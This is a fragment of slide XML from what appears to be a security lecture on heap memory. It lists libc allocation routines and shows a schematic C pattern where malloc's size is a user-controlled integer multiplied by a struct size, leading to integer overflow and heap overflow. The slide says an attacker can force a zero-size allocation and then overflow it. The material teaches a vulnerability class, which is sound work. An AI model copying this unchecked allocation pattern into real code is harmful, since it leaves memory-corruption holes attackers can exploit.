              <a:t>for security reasons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C routines</a:t>
            </a:r>
          </a:p>
        </p:txBody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libc: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malloc()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free()  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Simply links a region to the FreeList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realloc()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brk()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mmap()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heap overflow bug</a:t>
            </a:r>
          </a:p>
        </p:txBody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integer overflow &amp; heap overflow combo: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 = malloc(sizeof(something) *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user_controlled_int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 = 0; i &lt;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user_controlled_int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 i++){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(user_buf[i] ==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copyinto(buf, user_buf);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1" name="Shape 931"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6483500" y="2589275"/>
            <a:ext cx="353100" cy="16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2" name="Shape 932"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5809500" y="4226075"/>
            <a:ext cx="2610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attacker can allocate 0,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copy a large array into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